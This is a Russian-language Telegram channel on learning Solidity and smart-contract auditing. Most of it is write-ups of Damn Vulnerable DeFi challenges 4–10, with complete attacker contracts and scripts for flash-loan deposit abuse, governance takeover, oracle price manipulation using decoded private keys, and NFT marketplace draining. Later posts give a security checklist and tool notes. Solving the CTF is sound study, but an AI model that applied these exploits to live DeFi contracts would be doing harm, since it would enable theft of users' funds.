Solidity. Смарт контракты и аудит – Telegram
Solidity. Смарт контракты и аудит
2.62K subscribers
246 photos
7 videos
18 files
547 links
Обучение Solidity. Уроки, аудит, разбор кода и популярных сервисов
Download Telegram
Damn Vulnerable Defi. Задача 4. Side entrance

В чем суть?

Нужно вывести весь Эфир с пула.

В этой задаче функция flashloan() по итогу просто проверяет баланс контракта, на предмет вернулся ли займ обратно. Также есть execute() функция, которая и должна отвечать за возврат займа в нашем контракте.

Чтобы взломать этот пул нам достаточно взять займ и в функции execute() в нашем контракте вызвать функцию deposit() пул контракта. Поняли схему?

Мы берем займ и закидываем его сразу себе на счет. Баланс контракта пополняется на сумму займа, и flashloan(), со своей проверкой баланса, думает что все ок и займ вернулся. После чего мы может просто вызвать функцию withdraw() и забрать все деньги.

Просто контракт может выглядеть так:

contract Attacker4 {

  SideEntranceLenderPool pool;
  address payable attacker;

  constructor (address poolAdd, address attackerAdd) {
    pool = SideEntranceLenderPool(poolAdd);
    attacker = payable(attackerAdd);
  }

  function attack(uint256 amount) external {
    pool.flashLoan(amount);
    pool.withdraw();
  }

  function execute() external payable{
    pool.deposit{value: msg.value}();
  }

  receive () external payable {
    attacker.transfer(msg.value);
  }
}

И решение:

const SideEntranceAttackerFactory = await ethers.getContractFactory('Attacker4', deployer);
const attackerContract = await SideEntranceAttackerFactory.deploy(this.pool.address, attacker.address);
await attackerContract.connect(attacker).attack(ETHER_IN_POOL);

Проверяем через yarn run side-entrance.

#dvd #DamnVulnerableDefi
Damn Vulnerable Defi. Задача 5. The rewarder

Есть пул, которые предлагает вознаграждение в токенах каждые пять дней для тех, кто сделал депозит своих токенов в него. Четыре человека уже сделали депозит и получили свой выигрыш. В новом раунде, вам нужно забрать выигрыш себе. Можно использовать другой пул, который предлагает займы токенов.

В чем суть?

Задача заняла у меня больше времени, так как я искал внутреннюю уязвимость контрактов, вместо раздумывания над условием. Нам нужно просто получить токены из вознаграждения. Ни взламывать функции, ни искать подоплеку не нужно.

Просто берем займ, делаем депозит, получаем бонусы, возвращаем займ. И это работает. Хотя есть некая неуверенность, что смысл задачи был именно в этом. Но условие соблюдено, значит ок.

И так, мы берем займ в пуле, потом в функции, которая отвечает за возврат средств, прописываем условия депозита, вывод награды и возврата займа.

Простой контракт может выглядеть так:

contract Attacker5 {

    DamnValuableToken damnValuableToken;
    FlashLoanerPool flashLoanpool;
    TheRewarderPool rewarderPool;
    RewardToken rewardToken;
    address attacker;

  constructor (
  address tokenAddress,
  address flashLoanPoolAddress,
  address rewarderPoolAddress,
  address rewardTokenAddress,
  address attackerAddress) {
          damnValuableToken = DamnValuableToken(tokenAddress);
          flashLoanpool = FlashLoanerPool(flashLoanPoolAddress);
          rewarderPool = TheRewarderPool(rewarderPoolAddress);
          rewardToken = RewardToken(rewardTokenAddress);
          attacker = attackerAddress;
      }

    function attack(uint256 amount) external {
        flashLoanpool.flashLoan(amount);
    }

    function receiveFlashLoan(uint256 amount) external {
        damnValuableToken.approve(address(rewarderPool), amount);
        rewarderPool.deposit(amount);
        rewarderPool.distributeRewards();
        rewarderPool.withdraw(amount);
        rewardToken.transfer(attacker, rewardToken.balanceOf(address(this)));
        damnValuableToken.transfer(msg.sender, amount);
    }
    receive() external payable {}
}

Ну, и в решении, главное промотать время на 5 дней вперед.

const RewarderAttackerfactory = await ethers.getContractFactory('Attacker5', deployer);
const attackerContract = await RewarderAttackerfactory.deploy(
  this.liquidityToken.address,
  this.flashLoanPool.address,
  this.rewarderPool.address,
  this.rewardToken.address,
  attacker.address
);
await ethers.provider.send("evm_increaseTime", [5 * 24 * 60 * 60]);
await attackerContract.connect(attacker).attack(TOKENS_IN_LENDER_POOL);

Проверяем на правильность решения командой yarn run the-rewarder.

#dvd #DamnVulnerableDefi
👍2
Damn Vulnerable Defi. Задача 6. Selfie

Есть пул, который предлагает заqмы в токенах и имеет свой governance. Цель задачи захватить все токены из пула.

В чем суть?

Задача научила меня смотреть не только сами контракты, но и js файл, или точнее сказать условия их деплоя. Тогда вся картина сложилась. А именно то, что оба этих контракта используют один и тот же токен: и для займа, и для голосования. Более того, нет никакой проверки, откуда у адресата токены.

Картина взлома такая: мы берем займ по известной ранее схеме, создаем голосование и потом выводим все токены. Но тут есть пара моментов.

Когда мы создаем новое предложение в governance, используя функцию queueAction(), то создаем новую структуру GovernanceAction, одним из параметров которой является bytes data. Его можно использовать для передачи функции на вывод всех токенов из пула.

Также, чтобы создать предложение, нам нужно пройти проверку _hasEnoughVotes() на количество токенов, которое должно превышать половину всех выпущенных токенов. По условию выпущено 2млн токенов, и нам нужно владеть хотя бы 1 млн токенов + 1.

Если посмотреть, то проверка описается на метод getBalanceAtLastSnapshot(), который в свою очередь берет значения из фукнции snapshot(). Это можно увидеть, открыв файл DamnValuableTokenSnapshot.sol.

Поэтому, перед тем как создавать свое предложение, нам нужно пройти проверку и для этого вызвать функцию snapshot().

Код контракта может выглядеть так:

contract Attacker6 {

    ERC20Snapshot public token;
    SelfiePool private immutable pool;
    SimpleGovernance private immutable governance;
    address payable attacker;
    uint256 public actionId;

    constructor (address tokenAddress, address poolAddress, address governanceAddress, address attackerAddress) {
        token = ERC20Snapshot(tokenAddress);
        pool = SelfiePool(poolAddress);
        governance = SimpleGovernance(governanceAddress);
        attacker = payable(attackerAddress);
    }

  function attack(uint256 amount) external {
     pool.flashLoan(amount);
  }

  function receiveTokens(address tokenAddress, uint256 amount) external {
      DamnValuableTokenSnapshot governanceToken = DamnValuableTokenSnapshot(tokenAddress);
      governanceToken.snapshot();
      actionId = governance.queueAction(address(pool), abi.encodeWithSignature(
            "drainAllFunds(address)",
            attacker
            ), 0);
        token.transfer(msg.sender, amount);
    }

  receive() external payable {}
}

И решение:

const SelfieAttackerFactory = await ethers.getContractFactory('Attacker6', deployer);
const attackerContract = await SelfieAttackerFactory.deploy(this.token.address, this.pool.address, this.governance.address, attacker.address);
await attackerContract.connect(attacker).attack(TOKENS_IN_POOL);
const actionId = ethers.BigNumber.from(await attackerContract.connect(attacker).actionId());
await ethers.provider.send("evm_increaseTime", [2 * 24 * 60 * 60]);
await this.governance.connect(attacker).executeAction(actionId);

Проверка через команду yarn run selfie.

#dvd #DamnVulnerableDefi
Damn Vulnerable Defi. Задача 7. Compromised

Нам нужно забрать весь Эфир с обменника.

В чем суть?

Я никогда ранее не встречал таких выводов с числами, поэтому скажу сразу, что эту задачу я пошел гуглить.

Как оказалось эти длинные значение, типа:

4d 48 68 6a 4e 6a 63 34 5a 57 59 78 59 57 45 30 4e 54 5a 6b 59 54 59 31 59 7a 5a 6d 59 7a 55 34 4e 6a 46 6b 4e 44 51 34 4f 54 4a 6a 5a 47 5a 68 59 7a 42 6a 4e 6d 4d 34 59 7a 49 31 4e 6a 42 69 5a 6a 42 6a 4f 57 5a 69 59 32 52 68 5a 54 4a 6d 4e 44 63 7a 4e 57 45 35

Нужно сначала перевести из байтов в строковые значение, а потом использовать декодер base64, чтобы получить приватные ключи.

Эти ключи, как оказалось, являются доступами к оракулам. которые используются для получения средней цены для NFT, которые, по логике задачи, нам нужно взломать, чтобы получить весь Эфир на свой счет.

Итак, пойдем пошагово.

Через все операции по декодированию мы получаем два приватных ключа от оракулов.

Далее нам нужно создать объекты этих оракулов с помощью:

new ethers.Wallet(privateKey, ethers.provider);

Про Wallet можно почитать тут. Но в целом, Wallet содержит в себе публичный или приватный ключи, который используется для того, чтобы подписывать транзакции и доказывать ownership.

Другими словами, здесь мы создадим два объекта, подключив которые, мы сможем управлять ценой NFT и проходить модификатор onlyTrustedSource в контракте TrustfulOracle.

await this.oracle.connect(compromisedOracle1).postPrice("DVNFT", ethers.utils.parseEther("0"));

В этой строке мы "берем на контракт, подключаемся к нему от имени оракула и меняем цену".

Далее, так как мы установили цену в ноль, то можем дешево купить NFT.

Потом снова через оракула устанавливаем цену NFT, но уже на максимум.

Продаем наш "золотой" NFT.

Ну, и чтобы пройти последнюю проверку в тестах:

expect(await this.oracle.getMedianPrice("DVNFT")).to.eq(INITIAL_NFT_PRICE);

нужно установить цену NFT, какой она была изначально.

В этой задаче можно обойтись без написания кода контракта. И решение может выглядеть так:

let privateKey1 = "0xc678ef1aa456da65c6fc5861d44892cdfac0c6c8c2560bf0c9fbcdae2f4735a9";
let privateKey2 = "0x208242c40acdfa9ed889e685c23547acbed9befc60371e9875fbcd736340bb48";

let compromisedOracle1 = new ethers.Wallet(privateKey1, ethers.provider);
let compromisedOracle2 = new ethers.Wallet(privateKey2, ethers.provider);

await this.oracle.connect(compromisedOracle1).postPrice("DVNFT", ethers.utils.parseEther("0"));
await this.oracle.connect(compromisedOracle2).postPrice("DVNFT", ethers.utils.parseEther("0"));

const tx = await this.exchange.connect(attacker).buyOne({ value: ethers.utils.parseEther("0.01") });
await this.exchange.on("TokenBought", async(sender, tokenId, currentPriceInWei) => {
  await this.nftToken.connect(attacker).approve(this.exchange.address, tokenId);

  await this.oracle.connect(compromisedOracle1).postPrice("DVNFT", EXCHANGE_INITIAL_ETH_BALANCE);
  await this.oracle.connect(compromisedOracle2).postPrice("DVNFT", EXCHANGE_INITIAL_ETH_BALANCE);

  await this.exchange.connect(attacker).sellOne(tokenId);

  await this.oracle.connect(compromisedOracle1).postPrice("DVNFT", INITIAL_NFT_PRICE);
  await this.oracle.connect(compromisedOracle2).postPrice("DVNFT", INITIAL_NFT_PRICE);
});
await tx.wait(2);

Проверяем правильность решения командой yarn run compromised.

#dvd #DamnVulnerableDefi
Damn Vulnerable Defi. Задача 8. Puppet

Есть пул, который позволяет брать займы токенов, и где нужно сначала сделать депозит в два раза больше суммы, что хочешь взять, в качестве залога. Также на Uniswap v1 exchange открыт маркет, где лежат 10 Эфира и 10 токенов. Начав с 25 эфира и 1000 токенов, нужно захватить все токены с пула.

В чем суть?

Тут необходимы знания и опыт работы с Uniswap v1, так как задача предполагает прямое взаимодействие с биржей и понимание принципов ее ценообразования.

Для начала поговорим кратко о том, как формируется цена на обмен токенов в V1.

Допустим есть пул для обмена токенов DVT на ETH. Чтобы корректировать цену на них применяется формула t / z = k, где k - константа, это число не меняется для пула совсем.

Это приводит к тому, что если, например, t в пуле будет больше, то цена его будет меньше, и наоборот для z - количества в пуле меньше и цена выше.

Этим и предлагают воспользоваться в задаче.

1. Мы берем наши токены и обмениваем их на Эфир на бирже Uniswap. Обменять вообще все и опустошить пул не получится, поэтому максимум для обмена будет 9.9 ETH. Это приведет к тому, что Эфира на бирже почти не останется, зато токенов будет очень и очень много. Соответственно цена на токены упадет в разы.

2. Так как контракт PuppetPool использует функцию calculateDepositRequired() для расчета стоимости займа, которая в свою очередь опирается на цену пары Uniswap, то для займа 100 000 токенов, нам потребуется всего 20 ETH, после всех манипуляций на бирже.

Для решения задачи, нам нужно будет подключиться к бирже и выполнить обмен с помощью метода tokenToEthSwapOutput(), которые принимает в качестве аргументов сумму Эфира для обмена, количество ваших токенов, которые хотите обменять, и дедлайн (uint256). Эту информацию можно найти в официальной документации Uniswap V1 тут в разделе контракта Exchange.

Решение может быть таким:

await this.token.connect(attacker).approve( this.uniswapExchange.address, ATTACKER_INITIAL_TOKEN_BALANCE);
const tx = await this.uniswapExchange.connect(attacker).tokenToEthSwapOutput(ethers.utils.parseEther('9.9'),
            ATTACKER_INITIAL_TOKEN_BALANCE,
            (await ethers.provider.getBlock('latest')).timestamp * 2,
            { gasLimit: 1e6 }
        );
await tx.wait();
const depositRequired = await this.lendingPool.calculateDepositRequired(POOL_INITIAL_TOKEN_BALANCE);
await this.lendingPool.connect(attacker).borrow(POOL_INITIAL_TOKEN_BALANCE, {value: depositRequired});

Для проверки используем команду в консоли yarn run puppet.

#dvd #DamnVulnerableDefi
Damn Vulnerable Defi. Задача 9. Puppet v2

Задача очень похожа на предыдущую, только сейчас уже используется Uniswap v2. Мы стартуем с 20 Эфиром и 10 000 токенами, и целью является захват всего миллиона токенов в пуле.

В чем суть?

Тут я просидел пару часов, но так и не смог дойти до финала решения задачи, поэтому пришлось идти гуглить, как довести до конца.

Из первой задачи я понял, что и тут нужно сделать обмен на бирже, чтобы понизить цену токена, но потом затормозил в расчетах.

Итак, пойдем по шагам:

У нас на счету есть 20 Эфира и 10 000 токенов DTV. В пуле 1 млн токенов. Нам нужно узнать, сколько Эфира потребуется для займа.

Сумма депозита для займа рассчитывается функцией calculateDepositOfWETHRequired(), которая, в свою очередь, обращается к служебной функции _getOracleQuote(), и которая получает значение из Uniswap функции UniswapV2Library.quote().

В библиотеки Uniswap эта функция выглядит так:

function quote(uint amountA, uint reserveA, uint reserveB) internal pure returns (uint amountB) {      
  require(amountA > 0, 'UniswapV2Library: INSUFFICIENT_AMOUNT');
  require(
    reserveA > 0 && reserveB > 0,
    'UniswapV2Library:INSUFFICIENT_LIQUIDITY'
  );
  amountB = amountA.mul(reserveB) / reserveA;  
}

Т.е. amountB = amountA.mul(reserveB) / reserveA можно перевести для нашей задачи в:

costForAllDVTInPool = amountToBorrow * (reserveWETH / reserveDVT)

Теперь заменим строки значениями, которые даны нам по условию задачи:

ИтоговаяЦенаТокеновПула = 1 000 000 (10 / 100) получается 100 000 WETH.

И так как, опять же по контракту, нам нужно иметь сумму х3 для возможности займа, то всего требуется 300 000 WETH.

С этим понятно. Идем дальше.

На бирже Uniswap мы совершаем обмен всех наших токенов DVT на WETH, из чего их соотношение меняется с (100/10) до (10 100 / 0,09), соответственно цена DVT падает, а мы получаем 9.9 WETH.

Вернемся к формуле теперь:

newCostForAllDVTInPool = 1000000 * (0,09... / 10100) = 9.8...

И для полного займа нам потребуется 9.8 х 3 = 29.4... WETH.

У нас, после обмена, уже есть 9.9, а значит недостает 19.6 WETH.

По условиям задачи у нас уже есть 20 ETH, которые прораниваются 1/1 к WETH. Мы делаем депозит на контракт 19.6 ETH и получаем столько же WETH.

Все готово, теперь мы можем взять займ с пула на весь млн токенов!

Решение может выглядеть так:

await this.token.connect(attacker).approve(this.uniswapRouter.address, ATTACKER_INITIAL_TOKEN_BALANCE)
await this.uniswapRouter.connect(attacker).swapExactTokensForTokens(
   ATTACKER_INITIAL_TOKEN_BALANCE,
   0,
   [this.token.address, this.weth.address],
   attacker.address,
   (await ethers.provider.getBlock('latest')).timestamp * 2
)
await this.weth.connect(attacker).deposit({ value: ethers.utils.parseEther('19.6') })

const wethRequired = await this.lendingPool.calculateDepositOfWETHRequired(
POOL_INITIAL_TOKEN_BALANCE)
await this.weth.connect(attacker).approve(this.lendingPool.address, wethRequired)
await this.lendingPool.connect(attacker).borrow(POOL_INITIAL_TOKEN_BALANCE)

Проверяем командой yarn run puppet-v2.

Для меня тут сложность вызвало то, что нужно было держать в голове два токена (DTV, WETH) и сам Эфир, жонглируя ими в течение всех операций. Только смотря в решение и разбирая каждую строку, я смог, наконец, понять все идею взлома.

#dvd #DamnVulnerableDefi
👍1
Damn Vulnerable Defi. Задача 10. Free rider

Запустился новый маркет NFT с первыми 6 картинками и ценой в 15 ETH. Один из покупателей предлагает 45 ETH за взлом маркета и кражу всех токенов.

На счету у вас всего 0.5 ETH. Нужно выполнить задумку взлома.

В чем суть?

Как и для предыдущей задачи, тут нам требуется знать, как работает Uniswap, а точнее его flashloans. Другими словами, мы может взять некоторое количество Эфира, использовать его для своих целей, и вернуть в этой же транзакции, заплатив небольшую комиссию. Именно для комиссии, нам дали те 0.5 Эфира в начале.

Далее пройдемся по контракту и попробуем посмотреть, что может сыграть на на руку.

Взгляните на функцию _buyOne(). Она сначала пересылает сам токен, а потом еще и возвращает деньги заплатившему! Т.е. не продавец получит деньги, а покупатель вернет свои! Эту уязвимость и предлагают нам использовать в купе с flashloan от Uniswap.

Так как же выполнить задачу: получить быстрый займ, прокрутить NFT, отправив их на адрес заказчика, и после всего, получить свои 45 Эфира вознаграждения?

Логика будет такая: мы берем займ WETH, меняем его на ETH, покупаем NTF, возвращая деньги с помощью ошибки в коде, снова меняем ETH на WETH и отдаем займ с процентом на биржу Uniswap. И все это в одной транзакции!

Для этого потребуется написать небольшой контракт:

interface IWETH {
function deposit() external payable;
function transfer(address to, uint256 value) external returns (bool);
function withdraw(uint256) external;


contract Attacker10 {

IERC721 private immutable NFT;
IWETH private immutable WETH;
IUniswapV2Pair private immutable UNISWAP_PAIR;
 
//Создаем объекты контрактов NFT, WETH и пары Uniswap для обмена

address private immutable marketplace;
address private immutable buyer;
address private immutable attacker;

  uint256[] tokenIds = [0, 1, 2, 3, 4, 5];
 
  //токены для покупки

  receive() external payable {}

  constructor(
    address _nft,
    address payable _weth,
    address _pair,
    address payable _marketplace,
    address _buyer
  ) {
    NFT = IERC721(_nft);
    WETH = IWETH(_weth);
    UNISWAP_PAIR = IUniswapV2Pair(_pair);
    marketplace = _marketplace;
    attacker = msg.sender;
    buyer = _buyer;
}

function attack(uint256 _amount0) external {
   require(msg.sender == attacker);
   bytes memory _data = "1";
   UNISWAP_PAIR.swap(_amount0, 0, address(this), _data);
}

  //Функция обмена на WETH в Uniswap

function uniswapV2Call(
        address,
        uint256 _amount0,
        uint256,
        bytes calldata
    ) external {
  require(msg.sender == address(UNISWAP_PAIR) && tx.origin == attacker);
 
  //Получаем ETH
  WETH.withdraw(_amount0);
 
  //Покупаем NTF
  (bool nftsBought, ) =
marketplace.call{value: _amount0}(
     abi.encodeWithSignature("buyMany(uint256[])", tokenIds)
   );

  // Считаем комиссию и сумма swap
  uint256 _fee = (_amount0 * 3) / 997 + 1;
  uint256 _repayAmount = _fee + _amount0;

  //Получаем WETH для возврата займа
  WETH.deposit{value: _repayAmount}();

  //Оплачиваем займ
  WETH.transfer(address(UNISWAP_PAIR), _repayAmount);

  //Отсылаем NFT заказчику
  for (uint256 i = 0; i < 6; i++) {
    NFT.safeTransferFrom(address(this), buyer, tokenIds[i]);
   }

  //Забираем вознаграждение за злом от заказчика
  (bool ethSent, ) =
attacker.call{value: address(this).balance}("");
  require(nftsBought && ethSent);
}

  //Функция для приема NFT на контракт
  function onERC721Received(address, address, uint256,bytes memory)
  external view returns (bytes4) {
   require(msg.sender == address(NFT) && tx.origin == attacker);
   return 0x150b7a02;
  }
}

В документации можно найти, как рассчитывать комиссию за займ.

И решение может выглядеть так:
this.attackerContract = await (
await ethers.getContractFactory('Attacker10', attacker)
).deploy(
   this.nft.address,
   this.weth.address,
   this.uniswapPair.address,
   this.marketplace.address,
   this.buyerContract.address
)
await this.attackerContract.connect(attacker).attack(NFT_PRICE)

Проверяем командой yarn run free-rider.

Это уже второе или третье задание, которое я не могу решить сам и лезу в сеть, чтобы понять, как все делается. Да, можно было упорно сидеть и тратить несколько дней на это, но сейчас цели другие. Чуть позже я объясню.

#dvd #DamnVulnerableDefi
Damn Vulnerable Defi. Задачи 11, 12 и 13

Задача 13. Safe miners

Указано, что она перерабатывается и в GitHub сборнике ее нет.

Задача 11. Backdoor

Эта задача требует навыков работы с Gnosis Safe Wallet. Вообще с Gnosis у меня давняя проблема понимания, поэтому хочу однажды более прицельно разобраться в этом сервисе и его услугам.

Просто копировать решение не вижу смысла. Вернусь к задаче в момент изучения Gnosis.

Задача 12. Climber

Еще одна задача на работу с прокси паттернами, в частности UUPS. Чуть более сложная, чем та, что мы разбирали ранее.

Я хочу чуть больше почитать примеров о работе прокси контрактов и отложить эту задачу также на потом.

Я разобрал несколько решений, которые нашел в сети; понял, что от нас требовалось; понял смысл реализации. И вместе с тем понял, что не смогу находить уязвимости в других подобных задачах, если не поработаю с прокси вообще. Поэтому решил дать себе время.

Итого, 10 из 12 задач для новичка звучит не плохо. Останавливаться же мы не собираемся и пойдем искать другие задачи для практики поиска уязвимостей.

#dvd #DamnVulnerableDefi
Новая неделя - новые задачи

Нас уже 102!
🥳🥳🥳 Это настолько же классно, насколько и невероятно для меня. По началу я задумывал этот канал, как совместное обучение Solidity для небольшой группы людей, но постепенно он вырос в полноценный обучающий мини-портал, где собрана актуальная информация по блокчейн разработке.

И, несмотря на отсутствие мемов, развлекательного контента, прогнозов на крипто торговлю и прочую лабуду, у нас получается понемногу расти. Это здорово!

По традиции, напишу пару слов о том, чем мы будем заниматься в течение этой недели.

Прежде всего, я накопил пару десятков твитов и статей по Solidity, сервисам, новым течениям и т.д. Я постараюсь разобрать их, сделать посты и поделиться в группе. Понятное дело, сюда попадут только самые интересные материалы.

Далее мы посмотрим и попробуем разобрать два новых видео на канале Ильи про хранение данных и работу с памятью.

Также продолжим работать с вопросам безопасности смарт контрактов. И для начала подведем итоги работы с Ethernaut и DVD. Возможно, сделаем закрепленный пост с навигацией по темам. Еще хотелось бы проходить пару задач в день на других проектах, типа speedrunethereum или ethereumhacker.

Вот такой примерный план.

Приятной недели и легкого обучения!
5👍3
Безопасность и взлом контрактов v1.0

За последние три недели мы в хорошем темпе прогнали задачи Ethernaut и Damn Vulnerable Defi с одной целью: научиться видеть места, в которых могут таиться уязвимости контрактов.

Да, это несомненно клево суметь решить каждую задачу самому. Однако, теперь я могу с уверенность сказать, что проходить конкретно эти и любые другие задачи нужно дважды. Первый раз -  после изучения основ языка Solidity, и второй раз - после полугода обучения.

Теме безопасности уделяется неимоверно мало времени на курсах и в сети. А между тем, взломы контрактов происходят чуть ли не каждый день. Зная, о потенциальных угрозах с практической точки зрения, мы можем перестроить свою разработку на более безопасный путь.

Научиться видеть и понимать угрозы взлома должны стать базисом обучения разработчиков смарт контрактов.

Предлагаю вспомнить некоторые моменты в контрактах из задач, которые таили в себе уязвимости.

1. Версии Solidity. Достаточно много задач и примеров "плохого" кода были реализованы на старых версиях языка (ниже 0.8). Разработчики Solidity стараются фиксить баги и повышать безопасность с каждым новым релизом. Поэтому крайне рекомендовано использовать последние версии языка.

2. Права доступа. Продумывайте, кто и к каким функциям будет иметь доступ: админ, модератор, обычный пользователь или кто-то еще. Старайтесь максимально обезопасить функции передачи прав собственности и возможность принимать решения по выводу средств.

3. Области видимости функций. Не забывайте, что вызывать из могут и пользователи, и контракты, и callback функции и еще куча всего.

4. Обрабатывайте return, где это только можно. Многие функции, типа transfer и call, возвращают return (true, false, 0), который должен быть обработан перед продолжением выполнения логики функции.

5. Опасный delegatecall. Используйте его, только если наверняка знаете, как он работает и кто его сможет вызвать. Достаточно большое количество взломов было из-за него.

6. Callback функции. Встаньте на место хакера и подумайте, может ли он использовать callback функцию, чтобы забрать деньги с вашего контракта или заполучить права админа.

7. Знание всех функций стандартов. Если работаете с каким-либо стандартом (ERC20, ERC721 и другие), то следует понимать и знать, какие функции там существуют. Если контракт наследует от, например ERC20, то следовательно он имеет доступ ко всем функциям стандарта, даже если они не указны напрямую.

8. Базовые принципы работы. Вообще, связываясь например с прокси контрактами, не следует просто брать готовые шаблоны, даже на openzeppelin. Прежде всего следует изучить как можно больше материалов по работе и безопасности прокси. Бездумное копирование кода приведет к практически 100% гарантии взлома.

Уверен, позже мы еще добавим несколько пунктов в этот список. Но это то, что мы должны были понять после разбора задач.

#безопасность
👍5
Что такое динамические NFT?

Статья на английском языке вышла еще в начале апреля, но до этого момента я еще ни разу нигде не встречал упоминание о динамических NFT, или dNFT.

Все мы знаем, что как только NFT был создан, то информацию о нем нельзя изменить. При этом, обязательным параметром токена является его id, а метадата - полностью опциональна.

dNFT подразумевают регулярную возможность обновления этих метаданных: ссылки, описание и т.д. 

Такие dNFT могут найти широкое применение в играх, где не нужно будет каждый раз минтить новый лут при обновлении его характеристик, а можно будет просто обновить информацию об уже имеющимся.

Или при покупке недвижимости, обновлять информацию о ней в блокчейне, без необходимости "сжигать" старый токен и создавать новый.

Также мне понравился пример с видео в dNFT, когда организаторы добавляли по одному кадру в видео при покупке 1 внутреннего токена сервиса. Т.е. они выпустили 1 млн токенов, которые могли купить их пользователи. При каждой покупке, организаторы обновляли метаданные NFT и пользователям постепенно открывалось все видео! Круто, да?

Как я понял, dNFT не имеют своего стандарта и обновление метаданных происходит силами разработчиков, поэтому каждый может создать свой dNFT, немного пораскинув наработками.

#nft #dnft
👍3
Пара интересный сервисов

Нашел пару интересных сервисов для блокчейн разработчика.

Abi Ninja

Мини проект для взаимодействия с ABI контракта в различных сетях Эфира. Вы можете использовать как адрес контракта, который уже был подтвержден на etherscan, или же скопипастить адрес и abi.

Eth-toolbox

Прикольный мультитул для разработчика: делает конвертацию uint, хеширование инпутов, форматирование адреса, переводы hex и многое другое.

Создание древа Меркла

Прекрасные репозиторий на случай, если вам вдруг понадобится работать с древом в своем проекте.

#abininja #toolbox #merkletree #merkle
👍3
Оракулы Binance

В октябре этого года Binance запустила свой сервис оракулов.

В некотором роду он выступает конкурентом Price Feeds от Chainlink и некоторым сервисам TheGraph, так как позволяет мониторить цены на популярные активы.

Если вы создаете свое DeFi приложение, то оракулы Binance смогут помочь вам в этом.

Чуть больше почитать об этом можно тут.

#binance
👍4
Out of Gas

В Твиттере встретил код assembly, который пытается сохранить 1 бит очень "глубоко" в памяти, что приводит к перерасходу газа.

assembly {
mstore(not(0),1)
}

Вероятно, однажды код был использован в какой-либо атаке.

#assembly #gas
👍2
MetaMask Flask and Snaps

А знаете ли вы, что у Метамаск есть собственная программа для разработчиков, которые могут создавать и внедрять свои предложения \ наработки прямо в кошелек Метамаск?

Они сделали форк от основного проекта, того приложения, которым мы все пользуемся на телефонах и в браузере, назвали его Metamask Flask и сказали разработчиками, что они теперь могут писать свои мини приложения на js (Snaps).

Вот главная страница проекта, откуда можно скачать Flask и испытать его возможности. А тут почитать документацию.

В рамках данного поста, также хочу вам рассказать об одном из таких приложений для кошелька под названием Snapshot Snap

Приложение использует внутренний функционал кошелька с уведомлениям и позволяет создавать свои собственные уведомления на события в блокчейн.

Например, вы можете подписаться на события по какому-либо адресу, протоколу или цене.

В видео там приводится пример, когда пользователь устанавливает уведомление на ставку на его NFT, загруженного на Opensea. Каждый раз, когда кто-то делает новую ставку, владелец получает уведомление на свой кошелек Метамаск.

Самое классное то, что Метамаск будет брать самые популярные приложения Snaps и добавлять их в свой основной функционал. Поэтому в ближайшем будущем, во-первых, мы можем получить самый навороченный кастомизированный кошелек из всех существующих, а во-вторых, новую профессию - разработчик приложений для Метамаска.

Однажды Метамаск может стать эдаким Google Play в мире блокчейна.  

#metamask #flask #snaps
👍2
Структура/хранение данных

Очередной прекрасный видео урок от Ильи на его Youtube канале.

Это видео подойдет скорее для продвинутых учеников Solidity, так как без практики будет немного сложно соотнести знания с теорией.

Видео урок.

Особо добавить или разобрать тут нечего. Рекомендую посмотреть на досуге.

#memory
👍2
Динамические массивы и мэппинги в storage

И сразу по следам предыдущего видео мы посмотрим другой урок о storage.

Видео урок.

Здесь лектор более наглядно рассказывает о том, как располагаются значения в хранилище. Особое внимание он уделяет динамическим массивам и mapping.

В задачах на взлом контрактов мы встречали несколько упражнений, где требовалось знать работу памяти и уметь доставать значения через getStorageAt(). Поэтому эта тема является достаточно важной для обучения блокчейн разработчика!

#mapping #array #storage
👍1
NFT и сервисы Alchemy

В материалах, что я находил ранее, наткнулся на уроки Alchemy на английском языке, которые позволяют работать с NFT, а именно получить:

- владельца NFT;
- всю коллекцию;
- коллекцию с одного адреса;
- историю перемещения NFT;
- список адресов владельцев данной коллекции;
- адрес контракта создателя коллекции;
- метаданные токена;
- перемещения NFT у одного адреса;

Это сейчас не прямая цель обучения, но просто оставлю ссылку на документацию. Если я правильно понял, то определенное количество запросов там бесплатное, т.е. для проверки и своих тестов хватит.

#alchemy #nft
👍2
Мысли вслух

Как я уже писал ранее, я хочу найти работу в сфере безопасности смарт контрактов и аудита, поэтому начал активно штурмовать эту тему. И столкнулся с небольшой проблемой.

На канале мы разобрали достаточно много материалов по безопасности за последние три недели, включая задачи, подсказки, гайд и оптимизацию газа. Еще раньше я расписывал все возможные атаки на смарт контракты, и то, как подготовить его к аудиту. В общем, очень много всего по данной теме.

И теперь, когда я стараюсь найти что-то новое через гугл, youtube, twitter, то попадается также очень много повторного материала. Те же описания уязвимостей, те же простые примеры атак... Короче, я столкнулся с лимитом общедоступного материала. А повторяться совсем не хочется.

Я пошел немного дальше и залез на форумы специализированных компаний, которые предлагают программы bug bounty и поддерживают форумы для white hat хакеров. И там наткнулся на хороший материал / ссылки / примеры по безопасности.

Я хочу взять небольшой перерыв для изучения, так как сам многое не понимаю, поэтому посты на канале будут выходить чуть реже в последующие пару дней.

Потом нужно будет взять какую-нибудь легкую тему на недельку, типа работы с ethers.js, и поразбирать несколько примеров, как соединять сайт и контракт.

Всем хорошего дня!
👍6
Как скачать смарт контракт из сети?

Нашел прикольный проект, который позволяет решить эту проблему. Нужно просто скопировать адрес контракта, вставить в поле ввода на сайте и ниже появится его полная версия.

Вот ссылка на проект. Возможно, кому-то однажды пригодится.

P.S. В комментариях Nekto делится еще одной ссылкой на крутой проект Smart Contract Sanctuary.

#download #tools #toolbox
1👍1